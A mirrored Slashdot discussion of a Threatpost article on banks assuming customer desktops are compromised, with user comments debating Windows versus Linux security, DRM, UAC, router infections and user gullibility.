Slashdot Mirror
The Desktop Security Battle May Be Lost
Trailrunner7 writes in with a Threatpost.com article that begins: "For years, security experts, analysts and even users have been lamenting the state of desktop security. Viruses, spam, Trojans and rootkits have added up to create an ugly picture. But, the good news is that the desktop security battle may be over. The less-than-good news, however, is that we may have lost it. Jeremiah Grossman, CTO of WhiteHat Security, said Thursday that many organizations, particularly in the financial services industry, have gotten to the point of assuming that their customers' desktops are compromised. And moving forward from that assumption, things don't get much prettier." It goes on to speculate about home routers being targeted and infected.
The Desktop Security Battle May Be Lost
No, you must have hope! We just need to hold them off a little longer until Gandalf the White Hat shows up on Shadowfax Machine.
My work here is dung.
... fall into the sea, eventually.
That was a great piece of investigative journalism. Banks have accepted that all their customers are infected and gawd knows that every last home router is insecure. So not only are you infected but you don't even know it. Run for the hills.
Does any one remember WinNuke and 95, 98.a, since then it's been a joyride, cDc with back orifice. There will always be methodologies to penetrate microcomputers as long as an incentive exists. The only way to win this 'battle' is to remove the user from the equation; We all know this won't be happening... so live ignorantly and make do with your computer in some state of fault. Happy surfing!
Of all the things I've lost; I miss my mind the most. - Mark Twain
Then they could just assume that the customer's computer is incompatible.
They'll just use it as an excuse to sell 'identity theft' insurance and dump more
liability onto the customer. Their security isn't much better. PCI specs aren't
nearly good enough and evven if it was it wouldn't matter considering the way they
handle data security. Using regular post to send CDs of customer records unencrypted,
laptops lost and data breaches. Chip and Pin is a joke. Contactless transactions are worse.
They really dont care as long as it doesn't cost them much and they can dump most of the liability onto us.
The Year of Linux on the Desktop(tm) is just around the corner!
Of course we lost it.
If it is a truism that DRM is futile because it will always be defeated, then it is also a truism that Security is futile because it will always be defeated.
There are things you can do to "keep the honest people honest", but there is little you can do against those who are determined to do bad things.
A work that expires before its copyright never enters the public domain and thus enjoys eternal copyright protection.
> ...many organizations, particularly in the financial services industry,
> have gotten to the point of assuming that their customers' desktops are
> compromised.
They should have been assuming that all along. They should assume it even if only a tiny fraction of their customers' desktops are compromised.
Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
of this alarmist drivel is that there are only 2 adds on the poster's page.
-Rick
"Most people in the U.S. wouldn't know they live in a tyrannical state if it walked up and grabbed their junk." - MyFirs
Your bank uses activex?
emerge -s virus
Searching...
[ Results for search key : virus ]
[ Applications found : 0 ]
And what do condoms have to do with computer security, anyway?
(ducks for cover)
A republic cannot succeed till it contains a certain body of men imbued with the principles of justice and honour.
there is little you can do against those who are determined to do bad things.
Or against those that are determined to do stupid things, regardless of warnings and education on the dangers.
Remember to maintain your supply of
If it is a truism that DRM is futile because it will always be defeated, then it is also a truism that Security is futile because it will always be defeated.
What? No.
DRM can always be defeated because of its design. If I lend you the key to my apartment so you can go in and borrow some sugar or something, there's nothing I can do to stop you from cleaning out my apartment and skipping town. But to claim all locks are futile because of that is just retarded.
DRM can always be defeated because the "attacker" is exactly the same as the user, and you're already giving them everything they need. That is a system which is fundamentally flawed. Real security is where you don't give the attacker your keys, passwords, etc.
It is theoretically possible to build a completely secure system, from a technological standpoint. The vulnerabilities are either physical weaknesses (you could just run off with my laptop) or people. There are also vulnerabilities from sloppy coding, but these have very little effect against users with good security habits.
Sure, it may never happen, but if so, that's because we'll always make mistakes. A completely secure DRM scheme is actually a logical impossibility, even if no one makes any mistakes.
Don't thank God, thank a doctor!
Don't use Windows. Was that so hard?
I am not saying that all other operating systems are perfectly secure by default or that they are invulnerable, but windows is absolutely insecure. We have to face that truth.
Microsoft's security record is laughable. And I'm not even talking about particular exploits, bugs can be fixed, I am talking about design. Windows is designed to be insecure. Security was never really taken seriously at microsoft. There are countless techniques to escalate permissions on just about any win platform (Including windows vista and 7). And this are not obscure and complex vulnerabilities. This are simple 50 lines executables that allow you to escalate any process you want with a few clicks.
Just take a look at any of their products, either server or desktop, and their security record will be worse than any competitor. Exchange, SQL, IIS, Explorer, Windows, Office. They allow script execution in crazy places (like a simple text document or spreadsheet).
Windows is insecure for a very good reason: Because there is a huge industry that developed around fixing windows, that industry is so big that it has become the main tool of customer loyalty that microsoft has. Millions, from huge Antivirus companies, to overstuffed IT departments, to your average computer repairman base their economy on Windows flaws. Those guys love windows and all its flaws. I've actually had people telling me "Well, I know it's a piece of crap, but it's what keeps people coming to my shop again and again". Not to mention the computer retailers. Imagine the fall in Dell stock if people didn't have to buy a new computer every 2 years just to run the latest OS? A friend of mine has am iMac from 2001 running the latest OSX. And it runs amazingly well ... If people knew they can run a blazingly fast 3D desktop on an 80 dollar atom-based mother+processor combo, newegg would die.
So, no, we didn't loose the security battle, Microsoft won the marketing one.
WTF am I doing replying to an AC at 5 A.M on a Friday night?
No, I think you misunderstand. DRM is literally futile, in that unless you're playing something on a black box to which you have no access beyond basic input, it will be possible to break it. There is literally no way to do what they want to achieve.
Security is technically possible, and isn't really that hard to achieve on a simple level. The difficulty comes in with the added complexity needed to make systems more usable. It's ridiculously difficult, but when a system is built properly and accompanied with user training and users that know what they're doing, you can get pretty damn secure.
DRM is futile because customers need to have the 'secret' deciding key inside their machine to see the content. Combine this with a PC where you can look into the RAM and mess with it and you've got fail with a capital F.
Security isn't a product, it's a process. The problem isn't the security it's getting ordinary people to follow the process.
No sig today...
The fundamental security model of Linux is no better than that of Windows. The main reason Windows gets nailed is that it's more profitable to write malware for Windows than for anything else. If Linux had the market share of Windows, it would have as much, or nearly as much, malware.
In either Linux or Windows, being able to run any code at all gives you essentially complete access to the user's data, plus almost unlimited access to system resources, plus the ability to talk to the network. Who cares if you're not running as root if everything interesting is owned by the user's account?
There are ways to make systems more secure, starting with strong containment. How strong? Strong enough that your program can't even express the desire to, say, open a file that the user hasn't given it a capability for. Strong enough that the user has to jump through hoops to give certain programs access to certain data. Especially programs with network access... which need to be only the programs that actually need it. Strong enough to subdivide lots of functions that people are used to putting together in the same process. Strong enough that you can forget about most of the APIs you're used to coding with. And, if you're going to run apps out on the network, that whole system has to extend out into the network as well.
On top of that, people ought to be using tools that make it a lot harder to express common security bugs, and that help you to notice when you've created others.
If this is to be fixed, users and programmers are going to have to change the ways they do things. I'm not super optimistic.
Linux helps not at all. Even OpenBSD wouldn't help much.
We need to assign responsibility to those who can do something about it.
Every day, my firewall emails me a list of port scans against it, sorted by IP address. Most days that list is just under 100 different IP addresses scanning me, some days it is in the thousands of IP addresses - from all over the Internet (i.e. not just local addresses). This is on a residential DSL connection that offers no services to the world, isn't linked to by any web sites, and does not respond to any unsolicited traffic.
It seems reasonable to assume that most if not all of those IP addresses represent infected machines. Were there some way to get them shut down, imagine how much cleaner the Internet would be. However, there IS no way to do so: the ISPs hosting those machines don't provide any meaningful or automated way to report them, there is no way to contact the owner of those machines, so they just keep on spewing and infecting the rest of the system.
Nor will ISPs ever provide an automated way of reporting such machines as things stand now: a reporting mechanism is an internalized cost, and there is no reason for an ISP to internalize that cost when they can externalize it to the rest of the Internet.
This is one of those rare cases where "there ought to be a law" is a reasonable response: were ISPs required by law to investigate abuse reports and disconnect infected clients until those clients are cleaned up, the number of infected machines on the Internet would be reduced, the profit margins of the bot-herders and spammers wiped out, and the system would clean itself up. However, such a law would be fought most vigorously by all ISPs precisely because it would be internalizing a currently externalized cost, and it would be worth vastly more to ISPs to prevent such a law than the cost of lobbying against it.
(NB: "repeatedly submitting false abuse reports" is itself abuse, and should also result in the source of the false reports being shut down).
"Trojan/Worm/Virus" credits, anyone?
www.eFax.com are spammers
I disagree. Even working at a university, it completely depends on how you run your show. The department I'm part of has a border firewall, client firewalls, no one runs as administrator, antivirus, spyware, malware checkers are run on a regular basis. More important than any of those: we spend time to educate our users on security. They know what to avoid in terms of phishing scams, never to give out passwords to anyone, what to look for before you click on a link in an email (or even a website), etc.
To say the desktop war has been lost because the company you talked to has sucky IT and suckier IT clients...is just dumb.
It's simply a matter of convenience. There are several ways to make online banking completely secure. For instance, the bank could distribute Live CDs/USBs with a bare linux system and a browser. You want online banking? Wait for a minute or two, then login through the browser presented. Problem is, no one would put up with such inconvenience. WE WANT ACCESS RIGHT NOW!!!! Waiting for two minutes is unthinkable... Ultimately, you're right - as long as there are users, there will always be security problems, although the solution is 2 minutes away. We are just so fucking impatient :)
you are quite a jokester, sir.
The differences in how to gain administrator access do affect up front security requirements.
It's not about profit, it's that windows gives people administrator by default (and you can still enable it in Windows 7).
iexplore.exe is asking for administrator access. grant forever/don't ask again? Way to go, giving viruses admin access. It happens all the time.
The rest of the security is no different in most scenarios whether windows or linux. However, on this front, UAC doesn't do squat (especially when you can get around UAC).
I hope that was a joke. Terrible analogy. Let's think for a moment what would happen if we dropped all security measures in place today. I mean all (drop all firewalls, disable all spam filters, anti-virus, encryption, etc.). The Internet would collapse in a matter of seconds. Emails becoming completely unusuble, the remaining PCs infected, servers rooted, websites defaced... Now imagine what would happen if we suddenly dropped all DRM schemes. Nothing.
This sort of FUD is in the best interest of those who sell "Identity guard" style products/subscriptions.
-- if you mod me down, I will become more powerful than you can possibly imagine
The practice of using a single privileged account for everything - banking, reading slashdot, downloading porn - may be doomed, and about time too. But I still think there's hope for using a single piece of hardware and a single network. Even if it comes down to using not just separate accounts, but separate cores, for play and work. Last time I looked (a while back) some CPU manufacturers were adding features for process separation but the OS had not yet implemented support. End-to-end encryption should protect your data in transit, if not your usage pattern, though there a a few things to fix in SSL implementations to prevent MITM.
I agree with you, but I think a better analogy to PC security is hiring a chauffeur to drive your car. Suppose you tell him to drive to a bad part of town so you can check out the russian porn sites, but don't lock your doors. While you're away somebody opens the car, clubs Jeeves over the back of the head, steals his uniform and pretends to be him. When you get back to the car, you sit in the back seat and tell him where to go and don't really pay attention to the fact that now he has a mustache and speaks only Nigerian.
If you'd had locks on your car (and if you'd avoided the bad parts of town) then you'd be ok. However, because you went to foolish places and didn't take precautions, it's no surprise that next time you tell Jeeves to take you to the bank, you get taken for a ride in more ways than one.
Scientists point out problems, engineers fix them
altslashdot.org: The future of slashdot.
You mean, in our tidy little world of 1s and 0s, where bugs don't exist, computers work perfectly, just like how Hollywood portrays them? Time to come to grips with reality. The World Isn't Perfect (tm), film at 11. People will continue to get pwned on their computers, just like how convenience stores will continue to get robbed, and how funds will be embezzled, and assets seized by a coup, and on and on.
body massage!
I know that it's a sacred tradition to regurgitate fanboy oneliners without thinking, but in this case
1. it was even in the summary that by now even home routers are targeted by the asshats. I fail to see how a hardened Linux PC helps there.
2. Actually, it seems to me like most zombie PCs nowadays don't come from port overflow attacks any more, but because of users clicking on spam links, re-entering their bank password on some www.i-pwn-you.ru site (fictive address for example sake) because the email told them to, and installing crap.
I'm not sure how Linux would help there at all. You do know that you can download and install rootkits for Linux too, right? In fact even the term rootkit comes from the Unix world, not from Windows. What's to keep an asshat from making their rootkit masquerade as a cutesy Linux screensaver instead of a cutesy Windows screeensaver?
If user clue remains a constant, meet the Clueless family, a white suburban family whose only knowledge of computers is that the nice guy at the shop said they need the most expensive one: you'll still have Joe Clueless opening executables he received in spam mails. And his wife Jane Clueless confirming her Paypal and eBay password the fourth time this week alone, and none of them was on paypal.com or ebay.com. And downloading and installing some piece of spyware masquerading as some cutesy utility or casual game. And their son, Timmy Clueless installing what some dodgy site told him is some hack to see through walls in Counter-Strike. And of course it needs to be installed as root, in fact as a kernel module. So punkbuster (or equivalent) can't detect it, you know? *nudge* *nudge* *wink* *wink* Know what I mean, eh?
Just as they're not deterred by Windows popping up a big fat windows asking them if they really want to install stuff, they won't be deterred by whatever hoops your favourite Linux distro makes them jump through either. If they have to su -, they'll su -.
End result: they're still pwned.
A polar bear is a cartesian bear after a coordinate transform.
I know this because I got a message saying my antivirus was out of date and that I needed to install an update. I simply clicked the link, gave them my credit card number and I'm safe now. I even have a cool new homepage.
The Kai's Semi-Updated Website Thingy
The battle isn't winnable, not without a significant world wide crackdown on rights and liberties.
Using that logic to say we shouldn't fight the battle at all is fundamentally flawed though. It's akin to saying that the battle against murder, rape and kiddie porn isn't winnable and should be given up. Human nature cannot be changed, we've spent countless thousands of years learning and relearning that lesson when we forget what history has taught us before.
Just because human nature cannot be changed does not mean that we give up on protecting ourselves. You don't play to win, you play because you can't afford to lose.
We should assume compromise when we are building security into networked systems.
Anything less would not be diligent in proactive security. And security is always best when it is proactive, and not reactive.
And while it is inconvenient and even possibly insulting to those of use who have decent control over our system(s), we shouldn't base what we do upon our own security, we should be looking towards the weakest link and assume that it does and will continue to exist, and that is a vector for attack.
Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
iexplore.exe never asks for admin access. The installer for IE updates does, as it should, but iexplore.exe never does (unless a plugin does, I suppose -- or if you're blaming an application you downloaded on IE on iexplore.exe even though it's a different process).
While your suggestion is architecturally sound, the problem is that it is either A) A gigantic pain in the ass. or B) Gives enormous power to the vendor, that they will almost certainly exploit.
In the case of Linux, "A" largely applies. A properly configured SELinux setup will give you most of what you are asking for; but those are enough of a pain to set up that very few people have them.
Quitters never win.
Winners never quit.
But those who never win and never quit
are idiots.
-- despair.com
malware writers don't care one bit about administrator/root access. All they want is computers' resources.
And on a side note, UAC is light years ahead of it's Linux equivalent, gksudo, which can be easily faked by a rogue processes and in combination with cached credentials (see:Ubuntu) will give up root permissions to any rogue process that wants them.
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
Other countries seem to be realizing that's it's a much more winnable battle if home users aren't in an MS environment. Isn't this EXACTLY why the Canadian bank recently started handing out Linux Live Boot CDs for their customers to use when banking from home?
I think this is the article http://linux.slashdot.org/story/10/03/25/2350236/Can-Ubuntu-Save-Online-Banking
Yes, any halfway competent organization can secure its workstations. It's not that hard to form and enforce reasonable policies that keep the receptionist's system clean.
But when she gets home, there's no organization backing her up. There is no policy or IT support beyond (maybe) some Indian call centre who's first priority is getting her off the line ASAP. It's fair to assume her desktop at home has been compromised by anyone with the inclination to do so.
Relevancy Check here.
We are interrupting the scheduled Windblows/M$ bashing documentary with the news and weather report from the land of TFA:
Botnets are starting to target and infect routers and DSL modems. Scary, and a possible trend. Think about what this could mean. Should this problem become pervasive, it won't matter if PCs are disinfected, swapped out, or replaced with iPads, the bad guys are still control because they own the network below. They'll own DNS, the routers in between, and so on. There is effectively little defensive countermeasures to protect home routers and DSL modems, which are not exactly secure to begin with, or detect if they've been compromised.
These are all reasonable assumptions based on real-world attacks that have been going on for some time now. Attackers have been targeting home networking equipment for a couple of years, using a combination of vulnerabilities in the firmware and hardware to get control of home users' outbound Internet traffic. It's an increasingly effective strategy for attackers looking to get control of large numbers of systems, without having to re-infect them regularly.
That was Relevancy Check with news and the weather.
Now we return you to your scheduled blind worshiping your favorite non-M$ OS and Windblows/M$ bashing documentary.
Mit der Dummheit kämpfen Götter selbst vergebens
Now that HP has open sourced it's Polaris virus-safe computing project.
Higher Logics: where programming meets science.
You are not advocating that people stop downloading Russian porn are you? Because that is just crazy talk!
If I were God, wouldn't I protect my churches from acts of me?
So, suppose I'm the business end of a botnet.
What does administrator access give me?
Sure, I'll take if I can get it, because it might come in handy. But how important is it to me, really?
If I want to steal the user's credit card number, it's right there in a Quicken file. No admin access required.
If I want the user's contact list, it's in Outlook or whatever.
If I want to steal the user's passwords, no problem, I can still hook the keyboard one way or another, or just grab them from the browser's password store.
I may not be able to rewrite the browser, but I can debug the browser process and get the same effect.
If I want to run the webcam, no privileges are required.
If I want to send spam, I can make a TCP connection without administrator access.
OK, I may have trouble hiding myself as well as I'd like from privileged anti-malware programs, or make it monstrously hard for them to remove me. There are a few things I can't change on the local system. I probably can't hook file system or network access, and if I can it's probably for only one user. There are a few not-that-important services I can't talk to. I can't mess with the lower layers of the network very much. I can't create another user. It would be nice to be able to do those things. But it's not like I'm seriously handicapped without administrator access. And, since I also have access to run privileged programs or send requests to privileged services, I have a huge surface available to attack with 'sploits if I do want administrator access.
Same on Linux. Yeah, there are differences, but they're down in the noise; they aren't the sorts of qualitative things that would really matter in terms of making the desktop trustworthy.
Attackers have been targeting home networking equipment for a couple of years, using a combination of vulnerabilities in the firmware and hardware to get control of home users' outbound Internet traffic
So, regardless if you have Windows, Mac OS or Linux; you could be fucked.
It looks like an attacker can put code in your router's firmware that sends all your traffic through their computers and they sniff it and get your passwords to you bank accounts.
And there are other exploits.
RIP America
July 4, 1776 - September 11, 2001
We could start, by throwing the book at money mules. Anybody who's busted gets 5 years in the slammer for fraud, and paraded on the 6 o'clock news.
The failure to vigorously prosecute money mules is the big elephant in the room at the moment.
And if everyone in the world used Linux how long do you think it would be before people were sudoing Banzai Buddy?
There's no security that can't be defeated by the end user. If they have the ability to access administrator at all then they have the power to negate everyone's hard work.
You're wrong in saying administrator access is the basic difference between Linux and Windows. The most basic difference is in default file permissions. Windows ties read and execute together by default. You put an executable on a Windows system and it's immediately executable by anyone. That is not true with Linux. Executables are only executable by default if a a system tool, such as apt-get, yum, etc... is used to install them. Otherwise, the user himself must add the execute permission to the file.
This is a huge barrier to malware spreading like many instances of Windows malware has spread. Remember all those instances of one person opening an infected email and everyone in the office being infected as a result? Can't happen on Linux due to file permissions. That executable can't execute unless/until the user gives it execute permission.
Test it for yourself. Write a script on a Linux machine and try to execute it without adding execute permissions. You can't do it. Try that on Windows and it works. No changes necessary. That's a huge difference in security.
"while democracy seeks equality in liberty, socialism seeks equality in restraint and servitude." de Tocqueville
One thing I loved about the ThinkNIC I set up for my mom so many years ago was that it was impossible to break. It booted from read-only media (a CD) so I knew that mom could never screw up anything in her computer permanently. The worst possible crash could be fixed by just turning it off and back on.
With so many folks pushing "cloud-based" solutions for, well, everything - Why hasn't something like the ThinkNIC come back?
A little box with any sort of read-only memory could hold all the programs most users will ever want. Make that memory in the form of some sort of plug-in card, and the entire machine would be easy to upgrade. (ThinkNIC used to send out new CDs with the latest versions of their setup.) It would also be easy to fix if a security problem were found; just mail out a new SD card or whatever.
Banks could advertise "Real Security. Because we care." They could give away a small computer to customers with the promise that said little box would enable streamlined access to their accounts, all while doing nearly everything an adult could need from a computer.
There's a kernel of a good idea in there, somewhere. I'm not the entrepeneur to make it into a business but I'm wondering why I don't see anyone trying?
I never seem to have these problems. Is there some weird, vulnerable OS out there that a lot of folks are using?
there is little you can do against those who are determined to do bad things.
Or against those that are determined to do stupid things, regardless of warnings and education on the dangers.
I've always thought it would be a great idea for the state law enforcement agencies to look for e-mail addresses the same way spammers do. Then send fake phishing e-mails to those addresses. If a user responds favorably or goes to the phishing site, apply a court order requiring that the user is denied Internet access for six months. The justification is that their stupidity creates botnets and enables spam that harms many other people and reduces the overall quality of the entire network; therefore they should be held responsible for it.
While I don't normally want the government to find new ways to get involved in things, this one isn't so bad because it requires the active participation of the user. If your e-mail address is already out there, one more phishing attempt is a drop in the bucket. Other than one additional e-mail, anyone with sense enough not to respond to phishers would not be affected by this.
It is a miracle that curiosity survives formal education. - Einstein
t is theoretically possible to build a completely secure system, from a technological standpoint. The vulnerabilities are either physical weaknesses (you could just run off with my laptop) or people.
Err, that someone running of with your laptop is a "people". So is that someone who's writing malware.
"while democracy seeks equality in liberty, socialism seeks equality in restraint and servitude." de Tocqueville
Actually, it seems like a reasonable assumption to me. Always code or design assuming the worst. Before you decide what hoops you make the user jump through to get his money online, assume that he's pwned in every imaginable way, that his firewall is mis-configured to be a digital goatse ;) and probably he's not even who he says he is. And he's probably trying to break your system too. Because sooner or later you'll have to deal with just that. Now what can you do to mitigate such a situation?
Basically you can divide people and design philosophies into a spectrum between:
- optimistic: they expect the best possible outcome. They just know it'll be all right. The world is nice, the users do exactly the click sequence they've been told to, and his functions only receive exactly the right input.
- pessimistic: they expect that Murphy's Law is actually a law of the universe, and if something could possibly go wrong without violating the laws of physics, it will. Actually the real serious pessimists don't even exclude the laws of physics going wrong. They tend to have the speed of light as a variable ;) They also tend to bring a sweater or two along when going to the beach in Florida in August. And they just know that some bastard out there will feed their program the wrong input, or will have his password stolen by a keylogger and then sue when he finds his account empty. They tend to rarely be disappointed in those expectations, actually.
Personally I like my programs and processes designed by the latter. And it seems to me like this is what those banks are doing. They're for a change starting from the worst possible scenario as an assumption. Nothing wrong with that.
A polar bear is a cartesian bear after a coordinate transform.
I have SELinux on my desktop, although it's not as tightly configured as it could be. I'm typing this on it.. It's not what I want, and I don't think it can be made into what I want.
The problem with SELinux is that it falls into the classic "reference monitor" trap, where some outside piece of code tries to intuit the intent of something like a system call. It's a layered-on kludge, like a firewall.
I want something more like KeyKOS or EROS, perhaps with a layer of something like (but not identical to) MLS a la Bell and LaPadula, or some kind of compartment tagging system. In SELinux, I can still say "fopen (/etc/passwd)". In KeyKOS, "/etc/passwd" isn't even a defined name for me; if I need that file, I'll be given an opaque handle for it, which I can then store in my own name space if I want to.
It is not enough to layer on some kind of reference checker if the underlying programs assume that they have access to everything. One of the big reasons that SELinux is a PITA is that the behavior of the programs its trying to control is so complicated and irregular, and the people writing the programs aren't the people writing the SELinux configurations. Without big changes in the APIs and ways of doing things, it's really hard to guess what a program may try to do or what it needs.
SELinux also doesn't have the sort of granularity it would need for network access control. You only get control up to the socket layer. To do it right, you'd need to rearchitect the whole stack, so that you could give programs restricted access at whatever layer was appropriate. It should be possible to express "this program can get this URL (or, better yet, this opaque network handle), but not this other URL".
iexplore.exe is asking for administrator access. grant forever/don't ask again? Way to go, giving viruses admin access. It happens all the time.
That never happens because UAC does not have an option to "grant forever/don't ask again" when running a program as admin. It never has.
Don't use Windows. Was that so hard?
Heh. It's easy; I've done it myself. In fact, it's easier than using Windows, which has the most difficult UI in the industry, especially since it's constantly changing.
But that's all irrelevant, because computer security has absolutely nothing to do with sales. It's determined by ad budgets. Microsoft can spend (and has spent) over a billion US$ marketing a releases of Windows. The only other computer company that can come close to this is Apple, and they're more than an order of magnitude away from it. No other "competitor" stands a chance of getting the funding that it takes to get into the market.
And, in a sense, even that is irrelevant to the topic at hand. As far as security is concerned, the 90% or so of the customers who use MS Windows don't spend money on security. It's not something they can see, and they'll never understand the technical details. Building them a secure system is more expensive than not bothering with security, and it wouldn't increase sales past the current 90%, so why should MS bother?
Perhaps the best bit of evidence here is something that came out on /. recently: the discovery that, even if you tell Windows to not update anything automatically, there are still parts of "the system" that get updated whenever MS says (and the machine is connected to the Internet). During the discussion, it came out that this "feature" has been in Windows since XP. Now, to us geeks and nerds, this is obviously a "back door" that was planted purposely with the intention that outsiders be able to install software on a machine without permission. That's what it does, after all, and such things don't get implemented by accident. It's also obvious to us that it won't be limited to only MS employees; all it takes is a bit of "social engineering" (typically in the form of a bit of cash), and info about this back door will be available to essentially anyone. This has all been acknowledged by Microsoft.
But did this produce any outrage or abandonment of MS Windows? I haven't seen or read of any. The customers don't care. Security isn't something they actually use, so it's not interesting. If you try explaining the problems with this automatic update feature, their eyes glass over, they classify you as a computer nerd, and they switch to a topic that's actually interesting.
Actually, this is a case where the canonical auto analogy works quite well. Look at all the safety features that have been put into cars over the past decades. How many of them happened because customers were demanding them? Right; none. Safety features were all forced on the auto makers by government regulators. Customers couldn't even be persuaded to pay for seat belts; they had to be mandated by law. And then, most people refused to use them until the cops started writing tickets. In this case, it's pretty obvious that lives are quite literally at stake, yet people wouldn't pay for (or use) safety features. Safety had to be forced on them by those evil government regulators.
The situation is worse with computers. With cars, most of the safety features are visible and/or unobtrusive. With computers, most security features are either invisible or they become visible by interfering with usability. People don't pay for things they can't see, and they especially don't pay for things that interfere with what they're trying to do. The computer industry obviously doesn't know (or care) how to make security both silent and noninterfering, as the auto industry has (mostly) been able to do.
The computer industry does know a lot about security, of course. But the Market Leader that makes that 90% of delivered systems has no motive to implement good security, because it's a cost that doesn't add to their income, and they know that their customers don't care. They can invest a small amount in "security theater", and that's all they need. They can safely ignore the maybe 5% of the market that understands securit
Those who do study history are doomed to stand helplessly by while everyone else repeats it.
> And on a side note, UAC is light years ahead of it's Linux equivalent, gksudo
Yes. It's so far ahead of Linux that people GENERALLY TURN IT OFF BECAUSE IT IS SO D*AMN ANNOYING.
Yes. You're right. UAC is light years ahead of the competition when it comes to being a nuissance.
UAC is a total joke. You're an idiot for even bringing it up.
A Pirate and a Puritan look the same on a balance sheet.
No, it's about profit. The flaw in the Windows/Linux/OSX security model isn't administrator access. Having a concept of some split personality user is a ridiculous hack that dates from a security architecture designed in the 70s. Nobody would use it if designing an OS from scratch today.
The flaw in these systems models is that developer tools and debuggers specifically are not built in to the system but rather are treated the same as any other application, which means any app can take control of any other app with only an "are you sure" screen in between at best.
You'll notice that mobile OS' don't have this. ChromeOS will likely have the standard Chrome developer tools which are "special" and cannot simply be swapped out for some other app. This means less innovation in debuggers but it gives the possibility of implementing real security because apps become much less slippery.
The desktop PC era is coming to a close. Nobody is quite sure what'll come next but I'm putting my cards on a combination of some much improved iPad OS, Android or (more likely) ChromeOS. Right now these are the only contenders for the "usefully more secure than windows" crown.
You have too much faith in the average user, if you think they'll configure and admin a whole PC instead of just buying a small appliance and forgetting that it's even there. And if you actually want them to configure and admin it _well_, now that's a whole other issue.
A polar bear is a cartesian bear after a coordinate transform.
There are ways to make systems more secure, starting with strong containment.
There is a better way: to know the source of the programs you are running. To be able to evaluate how they work and rely on a vast community to openly discuss and fix errors.
Linux is obviously better than Windows, but even Windows users can enjoy better security by using open source for code that requires broad file/network privileges (such as a web browser) and then contain code that doesn't.
Awesome idea!
Security Free Day!
Educate them by giving them an annual example of *why* security is necessary.
Everyone backs up on the third Friday of August, and then drop the walls/encryption/anti-malware Saturday morning and let it go wild.
Sadly, I honestly think that it would be about as havok-wreaking as Y2K was. In other words, very little.
Every home router ships with a button that generates a OTP on a small display. I'm guessing a lot of these routers are owned because of weak passwords.
The main difference is cultural and longstanding.
Unixen are in the habit of granting the least amount of priveledge necessary and sandboxing regular users. This goes way back into the depths of time where the OS was intended to service more than one end user and tried to keep any single user from running amok and "bringing the entire network down".
The problem with Microsoft isn't so much that their OS is crap but that their single user Commodore 64 approach to the system means their apps are crap. They make stupid engineering decisions allegedly for the sake of "easy" and then miss being easy.
It all boils down to the fact that running random binaries from untrusted sources should be hard and there should be a nice thick line separating programs and data.
Most people don't want or need a scripting language masquerading as a word processor format.
"run this" types of "malware" will always plague systems that allow end users to run anything though.
A Pirate and a Puritan look the same on a balance sheet.
I've been running for 15 years now with out any anti-virus software or anti-malware at all and have never had a single security problem. Wait, I see the issue. Apparently, how secure a desktop is dependent on the desktop software. Who knew?
I don't think it's quite as you describe.
Your argument makes sense in a highly abstract, academic universe in which all people are perfectly skilled, knowledgeable and well resourced. This is too far removed from reality to be useful.
The first problem is that we know it's possible to build DRM that is extremely hard to crack. The PS3 is a working example of that. Games distributed via Xbox Live (versus dvd) are another example. These systems have been partially defeated a handful of times and then promptly re-secured. It turns out that though you technically speaking "have the keys" they are buried under so much silicon wizardry that in practice you don't have them.
The second is that it's very questionable whether there is any such thing as a "completely secure system" as you describe. Your phrasing is vague so I'll assume you're talking about resistance against attackers who are physically remote. The trend has been that over time, bugs that were once thought to be un-exploitable have become exploitable. For instance at one time both heap and integer overflows were not deemed to be a security issue until techniques for reliably exploiting them were published. Likewise, it's only recently that implementors of software cryptography have started thinking about statistical side-channel attacks and many (most?) engineers are still unfamiliar with them.
In short, it's possible to build both very strong DRM and very strong security against remote attackers, but real people routinely build very weak versions of both and I am skeptical there are any perfectly undefeatable systems out there.
HP Labs had some interesting experiments with CapDesk and Polaris trying to put some capability-based security features on top of Windows. I see three main objections to capability-based OSes:
o Picking the right set of capabilities to enforce is a tough problem that would probably require years of trial and error. For example, "open a network port" is way too broad.
o SELinux is an example of confining processes to particular kinds of access to particular objects. Defining SELinux policies has proven difficult in practice and the results are brittle.
o Nobody, to my knowledge, has demonstrated a practical one.
Test it for yourself. Write a script on a Linux machine and try to execute it without adding execute permissions. You can't do it.
$echo 'whoami' > test.sh
$sh test.sh
themoof
$
Just sayin....
so i have had occasion to think sort of weak thoughts about this. Yah, it seems reasonable to think everything is compromised. personally, i have had owned wifi routers and satellite modems. I tried openbsd for a desktop. my firewall has been openbsd for a decade. so what am i using now: stupid win xp. ah well, at least is supports flash and the audio works. and it is easy to reinstall everytime it gets infected enough to be noticeable. i figure i should try pc-bsd. why not? because if you look broadly enough, who has physical security?
However, I might like a box with some limited vetted software (sort of a joke) and hardware it takes a big crowbar to get to. Can it run random stuff or even take software updates? Nah. if it costs like a netbook, get a new one every year.
Or if someone has managed to trick iexplore.exe into executing hostile code.
But that'd never happen.
DRM: Terminator crops for your mind!
So you change the umask and then every new file is executable by default. The parent talks about changing settings in Windows to bypass security, you can do the same with your example in Linux.
Mainly because the current crop of Linux users are nerds. If the example Clueless family in my example exercised that level of caution, well, they wouldn't be clueless in the first place.
And if they were that cautious, they wouldn't get pwned in Windows either. I mean, it's not like that spyware crap was linked to from microsoft.com or anything.
The way they get pwned is more like:
Joe Clueless wakes up on a saturday morning, scratches his balls and goes to see if he has any email. Does he want herbal Viagra? Hmm, Jane has been faking too many headaches lately, maybe it couldn't hurt to at least look at the site. Just in case. Big fake UI popup tells him that he has 200 viruses on his system and needs to download and install the free Pwnage antivirus. Eeep, he doesn't want no nasty viruses on the computer he does his banking on, so let's hurry and do just that.
Next email tells him that the USPS couldn't deliver some package, and he has to run some attached executable to find out more details. Fuck, he wouldn't want to miss a package, so he dutifully does that.
Another emails tells him that the IRS wants something from him, so he does that again.
Next email tells him that hundreds of naked teenage babes are waiting for him at some .ru site. Well, Jane is out with the kid, maybe he has time to take a peek. Oh, he has to install this free dialer to see the pics. Well, sure, why not? He does that.
After clicking a bit around, another popup tells him that his computer has incriminating evidence against him and he needs to download and run this amazing browser history eraser. Teh oops. Jane might be pissed off if she sees porn sites in the browser history. Time to download and run this trojan too. He makes a mental note to complain about these browser devs who don't include that function already ;)
